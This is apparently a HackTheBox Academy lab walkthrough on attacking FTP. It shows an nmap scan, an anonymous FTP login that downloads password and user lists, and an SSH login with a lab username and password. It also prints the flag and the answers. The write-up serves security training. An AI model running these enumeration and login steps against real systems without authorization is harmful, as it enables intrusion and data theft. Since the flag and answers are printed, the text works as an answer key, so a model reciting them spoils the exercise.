Skip to content

Attacking FTP

ℹ️ Informations

  • 🌐 Website: HackTheBox
  • 📚 Module: Attacking Common Services
  • 🔗 Link: Attacking FTP

Question

What port is the FTP service running on?

📋 Walkthrough

To identify the port on which the FTP service is running, we can use the nmap tool to scan the target machine. The -sC option runs default scripts, and -sV attempts to determine the version of the services running.

$ nmap -sC -sV 10.129.203.6        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 14:22 UTC
Stats: 0:00:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.50% done; ETC: 14:23 (0:00:00 remaining)
Nmap scan report for 10.129.203.6
Host is up (0.026s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 71:08:b0:c4:f3:ca:97:57:64:97:70:f9:fe:c5:0c:7b (RSA)
|   256 45:c3:b5:14:63:99:3d:9e:b3:22:51:e5:97:76:e1:50 (ECDSA)
|_  256 2e:c2:41:66:46:ef:b6:81:95:d5:aa:35:23:94:55:38 (ED25519)
53/tcp   open  domain      ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
2121/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (InlaneFTP) [10.129.203.6]
|     Invalid command: try being more creative
|     Invalid command: try being more creative
|   NULL: 
|_    220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2121-TCP:V=7.95%I=7%D=3/20%Time=67DC24A3%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20\[10\.129\.203\.6\]
SF:\r\n")%r(GenericLines,8B,"220\x20ProFTPD\x20Server\x20\(InlaneFTP\)\x20
SF:\[10\.129\.203\.6\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20mo
SF:re\x20creative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x2
SF:0creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-03-20T13:22:46
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -1h00m04s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.00 seconds
From the scan results, we can see that the FTP service is running on port 2121.

Answer

2121

Question

What username is available for the FTP server?

📋 Walkthrough

To find the available username for the FTP server, we can connect to the FTP service using the ftp command and attempt to login with the anonymous username.

──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ftp 10.129.203.6 -p 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7108|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp          1959 Apr 19  2022 passwords.list
-rw-rw-r--   1 ftp      ftp            72 Apr 19  2022 users.list
226 Transfer complete
ftp> cat users.list
?Invalid command.
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||28183|)
150 Opening BINARY mode data connection for users.list (72 bytes)
    72       37.86 KiB/s 
226 Transfer complete
72 bytes received in 00:00 (2.70 KiB/s)
ftp> get passwords.list
local: passwords.list remote: passwords.list
229 Entering Extended Passive Mode (|||59961|)
150 Opening BINARY mode data connection for passwords.list (1959 bytes)
  1959      570.72 KiB/s 
226 Transfer complete
1959 bytes received in 00:00 (68.50 KiB/s)
ftp> exit
221 Goodbye.

The FTP server allows anonymous login, indicating that the username anonymous is available.

Answer

anonymous

Question

Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer.

📋 Walkthrough

Using the discovered username robin and its password 7iz4rnckjsduza7, we can login to the target machine via SSH and retrieve the flag.txt file.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ ssh robin@10.129.203.6 
robin@10.129.203.6's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu 20 Mar 2025 02:11:54 PM UTC

  System load:  0.0                Processes:               231
  Usage of /:   25.5% of 13.72GB   Users logged in:         0
  Memory usage: 14%                IPv4 address for ens160: 10.129.203.6
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

0 updates can be applied immediately.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

$ ls
flag.txt
$ cat flag.txt
HTB{ATT4CK1NG_F7P_53RV1C3}
$

The contents of the flag.txt file are HTB{ATT4CK1NG_F7P_53RV1C3}.

Answer

HTB{ATT4CK1NG_F7P_53RV1C3}